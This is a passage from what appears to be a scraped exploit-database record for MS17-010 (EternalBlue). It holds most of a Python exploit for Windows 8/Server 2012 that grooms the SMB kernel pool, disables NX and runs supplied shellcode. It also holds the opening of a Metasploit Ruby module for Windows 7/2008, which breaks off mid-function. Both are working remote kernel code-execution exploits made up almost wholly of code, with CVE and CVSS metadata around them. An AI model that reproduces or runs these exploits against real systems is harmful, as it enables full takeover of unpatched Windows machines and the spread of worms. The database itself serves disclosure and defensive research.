choose NTFEA size to 0x9000 \nNTFEA_SIZE = 0x9000 \n \nntfea9000 = (pack('<BBH', 0, 0, 0) + '\\x00')*0x260 # with these fea, ntfea size is 0x1c80 \nntfea9000 += pack('<BBH', 0, 0, 0x735c) + '\\x00'*0x735d # 0x8fe8 - 0x1c80 - 0xc = 0x735c \nntfea9000 += pack('<BBH', 0, 0, 0x8147) + '\\x00'*0x8148 # overflow to SRVNET_BUFFER_HDR \n \n''' \nReverse from srvnet.sys (Win2012 R2 x64) \n- SrvNetAllocateBufferFromPool() and SrvNetWskTransformedReceiveComplete(): \n// size 0x90 \nstruct SRVNET_BUFFER_HDR { \nLIST_ENTRY list; \nUSHORT flag; // 2 least significant bit MUST be clear. if 0x1 is set, pmdl pointers are access. if 0x2 is set, go to lookaside. \nchar unknown0[6]; \nchar *pNetRawBuffer; // MUST point to valid address (check if this request is \"\\xfdSMB\") \nDWORD netRawBufferSize; // offset: 0x20 \nDWORD ioStatusInfo; \nDWORD thisNonPagedPoolSize; // will be 0x82e8 for netRawBufferSize 0x8100 \nDWORD pad2; \nchar *thisNonPagedPoolAddr; // 0x30 points to SRVNET_BUFFER \nPMDL pmdl1; // point at offset 0x90 from this struct \nDWORD nByteProcessed; // 0x40 \nchar unknown4[4]; \nQWORD smbMsgSize; // MUST be modified to size of all recv data \nPMDL pmdl2; // 0x50: if want to free corrupted buffer, need to set to valid address \nQWORD pSrvNetWskStruct; // want to change to fake struct address \nDWORD unknown6; // 0x60 \nchar unknown7[12]; \nchar unknown8[0x20]; \n}; \nstruct SRVNET_BUFFER { \nchar transportHeader[80]; // 0x50 \nchar buffer[reqSize+padding]; // 0x8100 (for pool size 0x82f0), 0x10100 (for pool size 0x11000) \nSRVNET_BUFFER_HDR hdr; //some header size 0x90 \n//MDL mdl1; // target \n}; \nIn Windows 8, the srvnet buffer metadata is declared after real buffer. We need to overflow through whole receive buffer. \nBecause transaction max data count is 66512 (0x103d0) in SMB_COM_NT_TRANSACT command and \nDataDisplacement is USHORT in SMB_COM_TRANSACTION2_SECONDARY command, we cannot send large trailing data after FEALIST. \nSo the possible srvnet buffer pool size is 0x82f0. With this pool size, we need to overflow more than 0x8150 bytes. \nIf exploit cannot overflow to prepared SRVNET_BUFFER, the target is likely to crash because of big overflow. \n''' \n# Most field in overwritten (corrupted) srvnet struct can be any value because it will be left without free (memory leak) after processing \n# Here is the important fields on x64 \n# - offset 0x18 (VOID*) : pointer to received SMB message buffer. This value MUST be valid address because there is \n# a check in SrvNetWskTransformedReceiveComplete() if this message starts with \"\\xfdSMB\". \n# - offset 0x48 (QWORD) : the SMB message length from packet header (first 4 bytes). \n# This value MUST be exactly same as the number of bytes we send. \n# Normally, this value is 0x80 + len(fake_struct) + len(shellcode) \n# - offset 0x58 (VOID*) : pointer to a struct contained pointer to function. the pointer to function is called when done receiving SMB request. \n# The value MUST point to valid (might be fake) struct. \n# - offset 0x90 (MDL) : MDL for describe receiving SMB request buffer \n# - 0x90 (VOID*) : MDL.Next should be NULL \n# - 0x98 (USHORT) : MDL.Size should be some value that not too small \n# - 0x9a (USHORT) : MDL.MdlFlags should be 0x1004 (MDL_NETWORK_HEADER|MDL_SOURCE_IS_NONPAGED_POOL) \n# - 0x90 (VOID*) : MDL.Process should be NULL \n# - 0x98 (VOID*) : MDL.MappedSystemVa MUST be a received network buffer address. Controlling this value get arbitrary write. \n# The address for arbitrary write MUST be subtracted by a number of sent bytes (0x80 in this exploit). \n# \n# \n# To free the corrupted srvnet buffer (not necessary), shellcode MUST modify some memory value to satisfy condition. \n# Here is related field for freeing corrupted buffer \n# - offset 0x10 (USHORT): 2 least significant bit MUST be clear. Just set to 0xfff0 \n# - offset 0x30 (VOID*) : MUST be fixed to correct value in shellcode. This is the value that passed to ExFreePoolWithTag() \n# - offset 0x40 (DWORD) : be a number of total byte received. This field MUST be set by shellcode because SrvNetWskReceiveComplete() set it to 0 \n# before calling SrvNetCommonReceiveHandler(). This is possible because pointer to SRVNET_BUFFER struct is passed to \n# your shellcode as function argument \n# - offset 0x50 (PMDL) : points to any fake MDL with MDL.Flags 0x20 does not set \n# The last condition is your shellcode MUST return non-negative value. The easiest way to do is \"xor eax,eax\" before \"ret\". \n# Here is x64 assembly code for setting nByteProcessed field \n# - fetch SRVNET_BUFFER address from function argument \n# \\x48\\x8b\\x54\\x24\\x40 mov rdx, [rsp+0x40] \n# - fix pool pointer (rcx is -0x8150 because of fake_recv_struct below) \n# \\x48\\x01\\xd1 add rcx, rdx \n# \\x48\\x89\\x4a\\x30 mov [rdx+0x30], rcx \n# - set nByteProcessed for trigger free after return \n# \\x8b\\x4a\\x48 mov ecx, [rdx+0x48] \n# \\x89\\x4a\\x40 mov [rdx+0x40], ecx \n \nTARGET_HAL_HEAP_ADDR = 0xffffffffffd00e00 # for put fake struct and shellcode \n \n# Note: feaList will be created after knowing shellcode size. \n \n# feaList for disabling NX is possible because we just want to change only MDL.MappedSystemVa \n# PTE of 0xffffffffffd01000 is at 0xfffff6ffffffe808 \n# NX bit is at 0xfffff6ffffffe80f \n# MappedSystemVa = 0xfffff6ffffffe80f - 0x7f = 0xfffff6ffffffe790 \nfakeSrvNetBufferX64Nx = '\\x00'*16 \nfakeSrvNetBufferX64Nx += pack('<HHIQ', 0xfff0, 0, 0, TARGET_HAL_HEAP_ADDR) \nfakeSrvNetBufferX64Nx += '\\x00'*16 \nfakeSrvNetBufferX64Nx += '\\x00'*16 \nfakeSrvNetBufferX64Nx += pack('<QQ', 0, 0) \nfakeSrvNetBufferX64Nx += pack('<QQ', 0, TARGET_HAL_HEAP_ADDR) # _, _, pointer to fake struct \nfakeSrvNetBufferX64Nx += pack('<QQ', 0, 0) \nfakeSrvNetBufferX64Nx += '\\x00'*16 \nfakeSrvNetBufferX64Nx += '\\x00'*16 \nfakeSrvNetBufferX64Nx += pack('<QHHI', 0, 0x60, 0x1004, 0) # MDL.Next, MDL.Size, MDL.MdlFlags \nfakeSrvNetBufferX64Nx += pack('<QQ', 0, 0xfffff6ffffffe80f-0x7f) # MDL.Process, MDL.MappedSystemVa \n \nfeaListNx = pack('<I', 0x10000) \nfeaListNx += ntfea9000 \nfeaListNx += pack('<BBH', 0, 0, len(fakeSrvNetBufferX64Nx)-1) + fakeSrvNetBufferX64Nx # -1 because first '\\x00' is for name \n# stop copying by invalid flag (can be any value except 0 and 0x80) \nfeaListNx += pack('<BBH', 0x12, 0x34, 0x5678) \n \n \ndef createFakeSrvNetBuffer(sc_size): \n# 0x200 is size of fakeSrvNetBufferX64 \ntotalRecvSize = 0x80 + 0x200 + sc_size \nfakeSrvNetBufferX64 = '\\x00'*16 \nfakeSrvNetBufferX64 += pack('<HHIQ', 0xfff0, 0, 0, TARGET_HAL_HEAP_ADDR) # flag, _, _, pNetRawBuffer \nfakeSrvNetBufferX64 += '\\x00'*16 \nfakeSrvNetBufferX64 += '\\x00'*16 \nfakeSrvNetBufferX64 += pack('<QQ', 0, totalRecvSize) # offset 0x40 \nfakeSrvNetBufferX64 += pack('<QQ', TARGET_HAL_HEAP_ADDR, TARGET_HAL_HEAP_ADDR) # pmdl2, pointer to fake struct \nfakeSrvNetBufferX64 += pack('<QQ', 0, 0) \nfakeSrvNetBufferX64 += '\\x00'*16 \nfakeSrvNetBufferX64 += '\\x00'*16 \nfakeSrvNetBufferX64 += pack('<QHHI', 0, 0x60, 0x1004, 0) # MDL.Next, MDL.Size, MDL.MdlFlags \nfakeSrvNetBufferX64 += pack('<QQ', 0, TARGET_HAL_HEAP_ADDR-0x80) # MDL.Process, MDL.MappedSystemVa \nreturn fakeSrvNetBufferX64 \n \ndef createFeaList(sc_size): \nfeaList = pack('<I', 0x10000) \nfeaList += ntfea9000 \nfakeSrvNetBuf = createFakeSrvNetBuffer(sc_size) \nfeaList += pack('<BBH', 0, 0, len(fakeSrvNetBuf)-1) + fakeSrvNetBuf # -1 because first '\\x00' is for name \n# stop copying by invalid flag (can be any value except 0 and 0x80) \nfeaList += pack('<BBH', 0x12, 0x34, 0x5678) \nreturn feaList \n \n# fake struct for SrvNetWskTransformedReceiveComplete() and SrvNetCommonReceiveHandler() \n# x64: fake struct is at ffffffff ffd00e00 \n# offset 0x50: KSPIN_LOCK \n# offset 0x58: LIST_ENTRY must be valid address. cannot be NULL. \n# offset 0x110: array of pointer to function \n# offset 0x13c: set to 3 (DWORD) for invoking ptr to function \n# some useful offset \n# offset 0x120: arg1 when invoking ptr to function \n# offset 0x128: arg2 when invoking ptr to function \n# \n# code path to get code exection after this struct is controlled \n# SrvNetWskTransformedReceiveComplete() -> SrvNetCommonReceiveHandler() -> call fn_ptr \nfake_recv_struct = ('\\x00'*16)*5 \nfake_recv_struct += pack('<QQ', 0, TARGET_HAL_HEAP_ADDR+0x58) # offset 0x50: KSPIN_LOCK, (LIST_ENTRY to itself) \nfake_recv_struct += pack('<QQ', TARGET_HAL_HEAP_ADDR+0x58, 0) # offset 0x60 \nfake_recv_struct += ('\\x00'*16)*10 \nfake_recv_struct += pack('<QQ', TARGET_HAL_HEAP_ADDR+0x1f0, 0) # offset 0x110: fn_ptr array \nfake_recv_struct += pack('<QQ', (0x8150^0xffffffffffffffff)+1, 0) # set arg1 to -0x8150 \nfake_recv_struct += pack('<QII', 0, 0, 3) # offset 0x130 \nfake_recv_struct += ('\\x00'*16)*11 \nfake_recv_struct += pack('<QQ', 0, TARGET_HAL_HEAP_ADDR+0x200) # shellcode address \n \n \ndef getNTStatus(self): \nreturn (self['ErrorCode'] << 16) | (self['_reserved'] << 8) | self['ErrorClass'] \nsetattr(smb.NewSMBPacket, \"getNTStatus\", getNTStatus) \n \ndef sendEcho(conn, tid, data): \npkt = smb.NewSMBPacket() \npkt['Tid'] = tid \n \ntransCommand = smb.SMBCommand(smb.SMB.SMB_COM_ECHO) \ntransCommand['Parameters'] = smb.SMBEcho_Parameters() \ntransCommand['Data'] = smb.SMBEcho_Data() \n \ntransCommand['Parameters']['EchoCount'] = 1 \ntransCommand['Data']['Data'] = data \npkt.addCommand(transCommand) \n \nconn.sendSMB(pkt) \nrecvPkt = conn.recvSMB() \nif recvPkt.getNTStatus() == 0: \nprint('got good ECHO response') \nelse: \nprint('got bad ECHO response: 0x{:x}'.format(recvPkt.getNTStatus())) \n \n \n# do not know why Word Count can be 12 \n# if word count is not 12, setting ByteCount without enough data will be failed \nclass SMBSessionSetupAndXCustom_Parameters(smb.SMBAndXCommand_Parameters): \nstructure = ( \n('MaxBuffer','<H'), \n('MaxMpxCount','<H'), \n('VCNumber','<H'), \n('SessionKey','<L'), \n#('AnsiPwdLength','<H'), \n('UnicodePwdLength','<H'), \n('_reserved','<L=0'), \n('Capabilities','<L'), \n) \n \ndef createSessionAllocNonPaged(target, size): \n# The big nonpaged pool allocation is in BlockingSessionSetupAndX() function \n# You can see the allocation logic (even code is not the same) in WinNT4 source code \n# https://github.com/Safe3/WinNT4/blob/master/private/ntos/srv/smbadmin.c#L1050 till line 1071 \nconn = smb.SMB(target, target) \n_, flags2 = conn.get_flags() \n# FLAGS2_EXTENDED_SECURITY MUST not be set \nflags2 &= ~smb.SMB.FLAGS2_EXTENDED_SECURITY \n# if not use unicode, buffer size on target machine is doubled because converting ascii to utf16 \nif size >= 0xffff: \nflags2 &= ~smb.SMB.FLAGS2_UNICODE \nreqSize = size // 2 \nelse: \nflags2 |= smb.SMB.FLAGS2_UNICODE \nreqSize = size \nconn.set_flags(flags2=flags2) \n \npkt = smb.NewSMBPacket() \n \nsessionSetup = smb.SMBCommand(smb.SMB.SMB_COM_SESSION_SETUP_ANDX) \nsessionSetup['Parameters'] = SMBSessionSetupAndXCustom_Parameters() \n \nsessionSetup['Parameters']['MaxBuffer'] = 61440 # can be any value greater than response size \nsessionSetup['Parameters']['MaxMpxCount'] = 2 # can by any value \nsessionSetup['Parameters']['VCNumber'] = os.getpid() \nsessionSetup['Parameters']['SessionKey'] = 0 \nsessionSetup['Parameters']['AnsiPwdLength'] = 0 \nsessionSetup['Parameters']['UnicodePwdLength'] = 0 \nsessionSetup['Parameters']['Capabilities'] = 0x80000000 \n \n# set ByteCount here \nsessionSetup['Data'] = pack('<H', size) + '\\x00'*20 \npkt.addCommand(sessionSetup) \n \nconn.sendSMB(pkt) \nrecvPkt = conn.recvSMB() \nif recvPkt.getNTStatus() == 0: \nprint('SMB1 session setup allocate nonpaged pool success') \nelse: \nprint('SMB1 session setup allocate nonpaged pool failed') \nreturn conn \n \n \n# Note: impacket-0.9.15 struct has no ParameterDisplacement \n############# SMB_COM_TRANSACTION2_SECONDARY (0x33) \nclass SMBTransaction2Secondary_Parameters_Fixed(smb.SMBCommand_Parameters): \nstructure = ( \n('TotalParameterCount','<H=0'), \n('TotalDataCount','<H'), \n('ParameterCount','<H=0'), \n('ParameterOffset','<H=0'), \n('ParameterDisplacement','<H=0'), \n('DataCount','<H'), \n('DataOffset','<H'), \n('DataDisplacement','<H=0'), \n('FID','<H=0'), \n) \n \ndef send_trans2_second(conn, tid, data, displacement): \npkt = smb.NewSMBPacket() \npkt['Tid'] = tid \n \n# assume no params \n \ntransCommand = smb.SMBCommand(smb.SMB.SMB_COM_TRANSACTION2_SECONDARY) \ntransCommand['Parameters'] = SMBTransaction2Secondary_Parameters_Fixed() \ntransCommand['Data'] = smb.SMBTransaction2Secondary_Data() \n \ntransCommand['Parameters']['TotalParameterCount'] = 0 \ntransCommand['Parameters']['TotalDataCount'] = len(data) \n \nfixedOffset = 32+3+18 \ntransCommand['Data']['Pad1'] = '' \n \ntransCommand['Parameters']['ParameterCount'] = 0 \ntransCommand['Parameters']['ParameterOffset'] = 0 \n \nif len(data) > 0: \npad2Len = (4 - fixedOffset % 4) % 4 \ntransCommand['Data']['Pad2'] = '\\xFF' * pad2Len \nelse: \ntransCommand['Data']['Pad2'] = '' \npad2Len = 0 \n \ntransCommand['Parameters']['DataCount'] = len(data) \ntransCommand['Parameters']['DataOffset'] = fixedOffset + pad2Len \ntransCommand['Parameters']['DataDisplacement'] = displacement \n \ntransCommand['Data']['Trans_Parameters'] = '' \ntransCommand['Data']['Trans_Data'] = data \npkt.addCommand(transCommand) \n \nconn.sendSMB(pkt) \n \n \ndef send_nt_trans(conn, tid, setup, data, param, firstDataFragmentSize, sendLastChunk=True): \npkt = smb.NewSMBPacket() \npkt['Tid'] = tid \n \ncommand = pack('<H', setup) \n \ntransCommand = smb.SMBCommand(smb.SMB.SMB_COM_NT_TRANSACT) \ntransCommand['Parameters'] = smb.SMBNTTransaction_Parameters() \ntransCommand['Parameters']['MaxSetupCount'] = 1 \ntransCommand['Parameters']['MaxParameterCount'] = len(param) \ntransCommand['Parameters']['MaxDataCount'] = 0 \ntransCommand['Data'] = smb.SMBTransaction2_Data() \n \ntransCommand['Parameters']['Setup'] = command \ntransCommand['Parameters']['TotalParameterCount'] = len(param) \ntransCommand['Parameters']['TotalDataCount'] = len(data) \n \nfixedOffset = 32+3+38 + len(command) \nif len(param) > 0: \npadLen = (4 - fixedOffset % 4 ) % 4 \npadBytes = '\\xFF' * padLen \ntransCommand['Data']['Pad1'] = padBytes \nelse: \ntransCommand['Data']['Pad1'] = '' \npadLen = 0 \n \ntransCommand['Parameters']['ParameterCount'] = len(param) \ntransCommand['Parameters']['ParameterOffset'] = fixedOffset + padLen \n \nif len(data) > 0: \npad2Len = (4 - (fixedOffset + padLen + len(param)) % 4) % 4 \ntransCommand['Data']['Pad2'] = '\\xFF' * pad2Len \nelse: \ntransCommand['Data']['Pad2'] = '' \npad2Len = 0 \n \ntransCommand['Parameters']['DataCount'] = firstDataFragmentSize \ntransCommand['Parameters']['DataOffset'] = transCommand['Parameters']['ParameterOffset'] + len(param) + pad2Len \n \ntransCommand['Data']['Trans_Parameters'] = param \ntransCommand['Data']['Trans_Data'] = data[:firstDataFragmentSize] \npkt.addCommand(transCommand) \n \nconn.sendSMB(pkt) \nrecvPkt = conn.recvSMB() # must be success \nif recvPkt.getNTStatus() == 0: \nprint('got good NT Trans response') \nelse: \nprint('got bad NT Trans response: 0x{:x}'.format(recvPkt.getNTStatus())) \nsys.exit(1) \n \ni = firstDataFragmentSize \nwhile i < len(data): \nsendSize = min(4096, len(data) - i) \nif len(data) - i <= 4096: \nif not sendLastChunk: \nbreak \nsend_trans2_second(conn, tid, data[i:i+sendSize], i) \ni += sendSize \n \nif sendLastChunk: \nconn.recvSMB() \nreturn i \n \n \n# connect to target and send a large nbss size with data 0x80 bytes \n# this method is for allocating big nonpaged pool on target \ndef createConnectionWithBigSMBFirst80(target, for_nx=False): \nsk = socket.create_connection((target, 445)) \npkt = '\\x00' + '\\x00' + pack('>H', 0x8100) \n# There is no need to be SMB2 because we want the target free the corrupted buffer. \n# Also this is invalid SMB2 message. \n# I believe NSA exploit use SMB2 for hiding alert from IDS \n#pkt += '\\xffSMB' # smb2 \n# it can be anything even it is invalid \npkt += 'BAAD' # can be any \nif for_nx: \n# MUST set no delay because 1 byte MUST be sent immediately \nsk.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) \npkt += '\\x00'*0x7b # another byte will be sent later to disabling NX \nelse: \npkt += '\\x00'*0x7c \nsk.send(pkt) \nreturn sk \n \n \ndef exploit(target, shellcode, numGroomConn): \n# force using smb.SMB for SMB1 \nconn = smb.SMB(target, target) \n \n# can use conn.login() for ntlmv2 \nconn.login_standard('', '') \nserver_os = conn.get_server_os() \nprint('Target OS: '+server_os) \nif not (server_os.startswith(\"Windows 8\") or server_os.startswith(\"Windows Server 2012 \")): \nprint('This exploit does not support this target') \nsys.exit() \n \ntid = conn.tree_connect_andx('\\\\\\\\'+target+'\\\\'+'IPC$') \n \n# Send special feaList to a target except last fragment with SMB_COM_NT_TRANSACT and SMB_COM_TRANSACTION2_SECONDARY command \nprogress = send_nt_trans(conn, tid, 0, feaList, '\\x00'*30, len(feaList)%4096, False) \n \n# Another NT transaction for disabling NX \nnxconn = smb.SMB(target, target) \nnxconn.login_standard('', '') \nnxtid = nxconn.tree_connect_andx('\\\\\\\\'+target+'\\\\'+'IPC$') \nnxprogress = send_nt_trans(nxconn, nxtid, 0, feaListNx, '\\x00'*30, len(feaList)%4096, False) \n \n# create some big buffer at server \n# this buffer MUST NOT be big enough for overflown buffer \nallocConn = createSessionAllocNonPaged(target, NTFEA_SIZE - 0x2010) \n \n# groom nonpaged pool \n# when many big nonpaged pool are allocated, allocate another big nonpaged pool should be next to the last one \nsrvnetConn = [] \nfor i in range(numGroomConn): \nsk = createConnectionWithBigSMBFirst80(target, for_nx=True) \nsrvnetConn.append(sk) \n \n# create buffer size NTFEA_SIZE at server \n# this buffer will be replaced by overflown buffer \nholeConn = createSessionAllocNonPaged(target, NTFEA_SIZE-0x10) \n# disconnect allocConn to free buffer \n# expect small nonpaged pool allocation is not allocated next to holeConn because of this free buffer \nallocConn.get_socket().close() \n \n# hope one of srvnetConn is next to holeConn \nfor i in range(5): \nsk = createConnectionWithBigSMBFirst80(target, for_nx=True) \nsrvnetConn.append(sk) \n \n# remove holeConn to create hole for fea buffer \nholeConn.get_socket().close() \n \n# send last fragment to create buffer in hole and OOB write one of srvnetConn struct header \n# first trigger to overwrite srvnet buffer struct for disabling NX \nsend_trans2_second(nxconn, nxtid, feaListNx[nxprogress:], nxprogress) \nrecvPkt = nxconn.recvSMB() \nretStatus = recvPkt.getNTStatus() \nif retStatus == 0xc000000d: \nprint('good response status for nx: INVALID_PARAMETER') \nelse: \nprint('bad response status for nx: 0x{:08x}'.format(retStatus)) \n \n# one of srvnetConn struct header should be modified \n# send '\\x00' to disable nx \nfor sk in srvnetConn: \nsk.send('\\x00') \n \n# send last fragment to create buffer in hole and OOB write one of srvnetConn struct header \n# second trigger to place fake struct and shellcode \nsend_trans2_second(conn, tid, feaList[progress:], progress) \nrecvPkt = conn.recvSMB() \nretStatus = recvPkt.getNTStatus() \nif retStatus == 0xc000000d: \nprint('good response status: INVALID_PARAMETER') \nelse: \nprint('bad response status: 0x{:08x}'.format(retStatus)) \n \n# one of srvnetConn struct header should be modified \n# a corrupted buffer will write recv data in designed memory address \nfor sk in srvnetConn: \nsk.send(fake_recv_struct + shellcode) \n \n# execute shellcode \nfor sk in srvnetConn: \nsk.close() \n \n# nicely close connection (no need for exploit) \nnxconn.disconnect_tree(tid) \nnxconn.logoff() \nnxconn.get_socket().close() \nconn.disconnect_tree(tid) \nconn.logoff() \nconn.get_socket().close() \n \n \nif len(sys.argv) < 3: \nprint(\"{} <ip> <shellcode_file> [numGroomConn]\".format(sys.argv[0])) \nsys.exit(1) \n \nTARGET=sys.argv[1] \nnumGroomConn = 13 if len(sys.argv) < 4 else int(sys.argv[3]) \n \nfp = open(sys.argv[2], 'rb') \nsc = fp.read() \nfp.close() \n \nif len(sc) > 4096: \nprint('Shellcode too long. The place that this exploit put a shellcode is limited to 4096 bytes.') \nsys.exit() \n \n# Now, shellcode is known. create a feaList \nfeaList = createFeaList(len(sc)) \n \nprint('shellcode size: {:d}'.format(len(sc))) \nprint('numGroomConn: {:d}'.format(numGroomConn)) \n \nexploit(TARGET, sc, numGroomConn) \nprint('done') \n \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/142602/mswin82012eb-exec.txt"}, {"lastseen": "2017-05-17T05:27:20", "description": "", "cvss3": {}, "published": "2017-05-17T00:00:00", "type": "packetstorm", "title": "MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "modified": "2017-05-17T00:00:00", "id": "PACKETSTORM:142548", "href": "https://packetstormsecurity.com/files/142548/MS17-010-EternalBlue-SMB-Remote-Windows-Kernel-Pool-Corruption.html", "sourceData": "`## \n# This module requires Metasploit: http://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'ruby_smb' \nrequire 'ruby_smb/smb1/packet' \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = GoodRanking \n \ninclude Msf::Exploit::Remote::Tcp \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption', \n'Description' => %q{ \nThis module is a port of the Equation Group ETERNALBLUE exploit, part of \nthe FuzzBunch toolkit released by Shadow Brokers. \n \nThere is a buffer overflow memmove operation in Srv!SrvOs2FeaToNt. The size \nis calculated in Srv!SrvOs2FeaListSizeToNt, with mathematical error where a \nDWORD is subtracted into a WORD. The kernel pool is groomed so that overflow \nis well laid-out to overwrite an SMBv1 buffer. Actual RIP hijack is later \ncompleted in srvnet!SrvNetWskReceiveComplete. \n \nThis exploit, like the original may not trigger 100% of the time, and should be \nrun continuously until triggered. It seems like the pool will get hot streaks \nand need a cool down period before the shells rain in again. \n}, \n \n'Author' => [ \n'Sean Dillon <sean.dillon@risksense.com>', # @zerosum0x0 \n'Dylan Davis <dylan.davis@risksense.com>', # @jennamagius \n'Equation Group', \n'Shadow Brokers' \n], \n'License' => MSF_LICENSE, \n'References' => \n[ \n[ 'MSB', 'MS17-010' ], \n[ 'CVE', '2017-0143' ], \n[ 'CVE', '2017-0144' ], \n[ 'CVE', '2017-0145' ], \n[ 'CVE', '2017-0146' ], \n[ 'CVE', '2017-0147' ], \n[ 'CVE', '2017-0148' ], \n[ 'URL', 'https://github.com/RiskSense-Ops/MS17-010' ] \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'thread', \n}, \n'Privileged' => true, \n'Payload' => \n{ \n'Space' => 2000, # this can be more, needs to be recalculated \n'EncoderType' => Msf::Encoder::Type::Raw, \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'Windows 7 and Server 2008 (x64) All Service Packs', \n{ \n'Platform' => 'win', \n'Arch' => [ ARCH_X64 ], \n \n'ep_thl_b' => 0x308, # EPROCESS.ThreadListHead.Blink offset \n'et_alertable' => 0x4c, # ETHREAD.Alertable offset \n'teb_acp' => 0x2c8, # TEB.ActivationContextPointer offset \n'et_tle' => 0x420 # ETHREAD.ThreadListEntry offset \n} \n], \n], \n'DefaultTarget' => 0, \n'DisclosureDate' => 'Mar 14 2017' \n)) \n \nregister_options( \n[ \nOpt::RPORT(445), \nOptString.new('ProcessName', [ true, 'Process to inject payload into.', 'spoolsv.exe' ]), \nOptInt.new( 'MaxExploitAttempts', [ true, \"The number of times to retry the exploit.\", 3 ] ), \nOptInt.new( 'GroomAllocations', [ true, \"Initial number of times to groom the kernel pool.\", 12 ] ), \nOptInt.new( 'GroomDelta', [ true, \"The amount to increase the groom count by per try.\", 5 ] ) \n]) \nend \n \ndef check \n# todo: create MS17-010 mixin, and hook up auxiliary/scanner/smb/smb_ms17_010 \nend \n \ndef exploit \nbegin \nfor i in 1..datastore['MaxExploitAttempts'] \n \ngrooms = datastore['GroomAllocations'] + datastore['GroomDelta'] * (i - 1) \n \nsmb_eternalblue(datastore['ProcessName'], grooms) \n \n# we don't need this sleep, and need to find a way to remove it \n# problem is session_count won't increment until stage is complete :\\ \nsecs = 0 \nwhile !session_created? and secs < 5 \nsecs += 1 \nsleep 1 \nend \n \nif session_created? \nprint_good(\"=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\") \nprint_good(\"=-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\") \nprint_good(\"=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\") \nbreak \nelse \nprint_bad(\"=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\") \nprint_bad(\"=-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\") \nprint_bad(\"=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\") \nend \nend \n \nrescue ::RubySMB::Error::UnexpectedStatusCode, \n::Errno::ECONNRESET, \n::Rex::HostUnreachable, \n::Rex::ConnectionTimeout, \n::Rex::ConnectionRefused => e \nprint_bad(\"#{e.class}: #{e.message}\") \nrescue => error \nprint_bad(error.class.to_s) \nprint_bad(error.message) \nprint_bad(error.backtrace.join(\"\\n\")) \nensure \n# pass \nend \nend \n \n# \n# Increase the default delay by five seconds since some kernel-mode \n# payloads may not run immediately. \n# \ndef wfs_delay \nsuper + 5 \nend \n \ndef smb_eternalblue(process_name, grooms) \nbegin \n# Step 0: pre-calculate what we can \nshellcode = make_kernel_user_payload(payload.encode, 0, 0, 0, 0, 0) \npayload_hdr_pkt = make_smb2_payload_headers_packet \npayload_body_pkt = make_smb2_payload_body_packet(shellcode) \n \n# Step 1: Connect to IPC$ share \nprint_status(\"Connecting to target for exploitation.\") \nclient, tree, sock = smb1_anonymous_connect_ipc() \nprint_good(\"Connection established for exploitation.\") \n \nprint_status(\"Trying exploit with #{grooms} Groom Allocations.\") \n \n# Step 2: Create a large SMB1 buffer \nprint_status(\"Sending all but last fragment of exploit packet\") \nsmb1_large_buffer(client, tree, sock) \n \n# Step 3: Groom the pool with payload packets, and open/close SMB1 packets \nprint_status(\"Starting non-paged pool grooming\") \n \n# initialize_groom_threads(ip, port, payload, grooms) \nfhs_sock = smb1_free_hole(true) \n \n@groom_socks = [] \n \nprint_good(\"Sending SMBv2 buffers\") \nsmb2_grooms(grooms, payload_hdr_pkt) \n \nfhf_sock = smb1_free_hole(false) \n \nprint_good(\"Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.\") \nfhs_sock.shutdown() \n \nprint_status(\"Sending final SMBv2 buffers.\") # 6x \nsmb2_grooms(6, payload_hdr_pkt) # todo: magic # \n \nfhf_sock.shutdown() \n \nprint_status(\"Sending last fragment of exploit packet!\") \nfinal_exploit_pkt = make_smb1_trans2_exploit_packet(tree.id, client.user_id, :eb_trans2_exploit, 15) \nsock.put(final_exploit_pkt) \n \nprint_status(\"Receiving response from exploit packet\") \ncode, raw = smb1_get_response(sock) \n \nif code == 0xc000000d #STATUS_INVALID_PARAMETER (0xC000000D) \nprint_good(\"ETERNALBLUE overwrite completed successfully (0xC000000D)!\") \nend \n \n# Step 4: Send the payload \nprint_status(\"Sending egg to corrupted connection.\") \n \n@groom_socks.each{ |gsock| gsock.put(payload_body_pkt.first(2920)) } \n@groom_socks.each{ |gsock| gsock.put(payload_body_pkt[2920..(4204 - 0x84)]) } \n \nprint_status(\"Triggering free of corrupted buffer.\") \n# tree disconnect \n# logoff and x \n# note: these aren't necessary, just close the sockets \n \nensure \nabort_sockets \nend \nend \n \ndef smb2_grooms(grooms, payload_hdr_pkt) \ngrooms.times do |groom_id| \ngsock = connect(false) \n@groom_socks << gsock \ngsock.put(payload_hdr_pkt) \nend \nend \n \ndef smb1_anonymous_connect_ipc() \nsock = connect(false) \ndispatcher = RubySMB::Dispatcher::Socket.new(sock) \nclient = RubySMB::Client.new(dispatcher, smb1: true, smb2: false, username: '', password: '') \nclient.negotiate \n \npkt = make_smb1_anonymous_login_packet \nsock.put(pkt) \n \ncode, raw, response = smb1_get_response(sock) \n \nunless code == 0 # WindowsError::NTStatus::STATUS_SUCCESS \nraise RubySMB::Error::UnexpectedStatusCode, \"Error with anonymous login\" \nend \n \nclient.user_id = response.uid \n \ntree = client.tree_connect(\"\\\\\\\\#{datastore['RHOST']}\\\\IPC$\") \n \nreturn client, tree, sock 